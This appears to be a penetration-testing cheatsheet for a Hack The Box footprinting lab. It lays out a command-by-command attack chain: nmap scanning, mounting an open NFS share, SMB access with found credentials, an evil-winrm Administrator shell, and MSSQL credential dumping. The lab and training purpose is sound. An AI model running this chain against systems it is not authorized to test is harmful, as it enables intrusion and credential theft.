π‘οΈ Methodology Checklist
- Full port scan + service version detection
- Enumerate FTP, SMB, SSH, and any web services discovered
- Check for anonymous access on all services
- Test default credentials on each identified service
- Enumerate SMB shares and accessible files
- Brute-force SSH if credentials are not found passively
- Document all access paths found for reporting
π― Operational Context
Think Dumber First: Medium lab means the path is more guided β one or two main services are the key, not comprehensive enumeration. Focus on finding credentials in the first service that unlock the next. Check default passwords immediately for any management interface. The foothold is usually a misconfiguration, not a CVE.
When you land here: Medium Footprinting Lab. Identify the 2-3 key services. Check for default/weak credentials first. Look for credential exposure in service configs or outputs. Use discovered credentials to access next service. Flag is within reach after 2-3 pivots.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -p- --min-rate 1000 -T4 [TARGET_IP] -oN all_ports.nmap | Fast full TCP port scan |
ports=$(grep "open" all_ports.nmap | cut -d "/" -f 1 | tr "\n" ",") | Extract open ports |
sudo nmap -sV -sC -p $ports [TARGET_IP] -oA detailed_scan | Detailed scan on confirmed ports |
showmount -e [TARGET_IP] | Check for NFS shares |
sudo mount -t nfs [TARGET_IP]:/TechSupport ./target_share -o nolock | Mount NFS share |
smbclient -L [TARGET_IP] -U [USER] | List SMB shares with credentials |
smbclient //[TARGET_IP]/[SHARE] -U [USER] | Connect to SMB share |
evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]' | Gain WinRM shell |
sqlcmd -S . -E -Q "[SQL]" | Query MSSQL via trusted auth |
π¬ Deep Dive & Workflow
Attack Chain: Nmap β NFS unauthenticated access β Credential discovery β SMB with credentials β WinRM shell β MSSQL data extraction
Phase 1: Initial Recon
- All-ports TCP scan β identify NFS (111/2049), SMB (445), WinRM (5985)
- Parse ports:
ports=$(grep "open" all_ports.nmap | cut -d "/" -f 1 | tr "\n" ",") - Detailed version scan on open ports
Phase 2: NFS Access
showmount -e [TARGET_IP]β find accessible share (e.g.,/TechSupport (everyone))- Mount and browse β find credential file
Phase 3: SMB Enumeration
- Use found credentials to list SMB shares
- Connect to non-standard share β find SA/Administrator password in text file
Phase 4: WinRM Shell
- Password reuse:
evil-winrm -i [TARGET_IP] -u Administrator -p '[PASS]' - Confirm:
whoami
Phase 5: MSSQL Data
- From Administrator shell:
sqlcmd -S . -E -Q "..."(trusted auth = no separate DB login) - List databases β identify custom database
- List tables β dump contents β find target user credentials
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Initial service seems hardened with no obvious path | Credentials not found yet | Enumerate more carefully β check SNMP, NFS, and anonymous file shares for config files with credentials |
| Found credentials but canβt determine which service to try them against | Too many open services | Try against web login first (usually HTTP basic or form-based), then SSH, then SMB |
| Lab reset during session, losing progress | HTB lab timeout | Document discovered credentials and ports in notes immediately; labs can reset; re-enumerate quickly with saved notes |
| Service enumeration reveals nothing after 30 minutes | Approach is too narrow | Check for UDP services: nmap -sU --top-ports 20 [TARGET]; check all web ports including 8080/8443 |
| Connected to wrong target | Multiple targets in lab network | Confirm IP from HTB lab page; use ip route to check your VPN routing; ping correct target IP |
π Reporting Trigger
Finding Title: (Lab exercise β document the exploitation chain as a mini-pentest narrative. Identify: Vulnerability Class (misconfiguration/default creds/CVE), Attack Path, Impact (data exposed/access gained), and Recommendation for each finding.)